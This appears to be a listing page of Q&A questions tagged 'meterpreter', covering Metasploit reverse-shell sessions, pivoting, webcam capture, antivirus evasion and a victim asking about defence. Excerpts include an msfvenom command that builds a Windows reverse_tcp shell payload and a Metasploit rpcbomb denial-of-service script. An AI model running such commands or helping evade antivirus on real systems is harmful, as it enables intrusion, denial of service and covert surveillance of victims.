Questions tagged [meterpreter]

134 questions
0
votes
0 answers

meterpreter command `play` not working

I have created a payload using msfvenom, and after starting msfconsole, I am connected to the victim phone (me). I am able to run all commands but the play command shows an error. I want to play music from the attacker machine (linux, meterpreter)…
chand
  • 1
  • 1
0
votes
1 answer

Meterpreter: How to invoke commands in a loop for each new connection

I want to execute commands like screenshot on a regular interval (e.g. each 5min) for each incoming connection to Meterpreter using the reverse_tcp payload until the connection gets closed by the Windows clients. Is there any straightforward way to…
muffel
  • 103
  • 2
0
votes
2 answers

Meterpreter session vs shell

What is the meaning of "meterpreter session"? My understanding is it is a session that we can send commands to the host for execution. And a meterpreter session is created when we don't get a shell.
0
votes
0 answers

Will VPN help to restrict Meterpreter session?

I'm a victim of Meterpreter attack. I'm now using VPN in all the devices. My question is, will it help me to restrict meterpreter attack? If not, what is the way out to get rid of meterpreter attack?
0
votes
2 answers

How to run a meterpreter script multiple times

I have this very simple script to run a rpcbomb script from auxiliary/dos/rpc/rpcbomb for a DOS attack. use auxiliary/dos/rpc/rpcbomb set RHOSTS Victim_IP_Address set RPORT 111 exploit -j -z I want to run the script about 10 times but I cant find…
0
votes
2 answers

Making My Own Custom Payload

I have tried many different tools to avoid being detected by an AV while using meterpreter exploit. Here is a list of tools I have tried: Shellter, Posh C2, Hack the World, Veil, Fat Rat, and many more. But they keep getting detected. I have read on…
Mani
  • 7
  • 5
0
votes
1 answer

Hanging on When Sending Stage

I'm new to Metasploit. I set up a multi-handler exploit and also made an EXE file with meterpreter/reverse_tcp payload. Both 3rd party AV and Windows Defender are deactivated. But when the victim (my own Windows 10 machine) runs the EXE file, my…
Mani
  • 7
  • 5
0
votes
0 answers

After connecting to my backdoor, Meterpreter session is unstable and not usable

I uploaded my backdoor (made using msfvenom) and executed it on the remote machine. I'm able to connect to it using multi/handler , but after a while I get disconnected and then when I try to exploit again, I see the following behavior: Multiple…
C J
  • 101
0
votes
1 answer

How to execute a custom meterpreter payload?

I've hacked a box in an internal network 10.0.0.1 and I want to use 'pass-the-hash attack' on another box 10.0.0.2 but this box has Avira anti-virus installed in, and the common payload windows/meterpreter/reverse_tcp is detectable by Avira. So I…
0
votes
0 answers

Shell from meterpreter not responding to commands

Meterpreter session was created, framework latest. Victim machine: Ubuntu Screenshot of session: I am pretty sure the commands used to work before on the same machine. Shell commands are not working after giving shell in meterpreter. All…
0
votes
1 answer

Meterpreter pivot with a bind_named_pipe

I have a pivot setup on a compromised windows 10 box and am trying to get an SYSTEM shell on a separate machine in the target network. I have successfully done this abusing an unquoted service path via a meterpreter/reverse_named_pipe that connects…
Nitro
  • 189
  • 1
  • 8
0
votes
1 answer

MSF Venom Reverse TCP-Shell: Meterpreter and Netcat Listeners not responsive

I have created a MSFVenom TCP Reverse Shell Paypload that is executed on a Windows Machine: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.11.6.151 LPORT=4443 -f exe -o shell.exe In addition I am running a listener with Metasploit's…
GitCrush
  • 1
  • 1
  • 2
0
votes
1 answer

keep session alive

In this scenario where someone creates a meterpreter payload and sends it to the target that clicks on it, the person who sent the payload stays away from his PC and in that meantinme the target already turned off his pc. What happens to the…
stack2020
  • 1
  • 1
0
votes
2 answers

is there any way to exit meterpreter without exit the process?

I have a target process I'm injecting meterpreter shellcode (windows/meterpreter/reverse_tcp) into, I manage to get a shell but when I exit it, the process exits as well. Is there any easy way to make the process survive the meterpreter exit besides…
jony
  • 1
  • 1
0
votes
0 answers

How does meterpreter STDAPI bypass window's webcam restriction's settings

How does the stdapi commands 'webcam_snap' and 'webcam_stream' in meterpreter session bypass webcam restrictions/privacy settings on windows? I want to know how one could replicate this for prevention and analysis or just how it works in general.
sd dev
  • 11
  • 2
1 2 3
8 9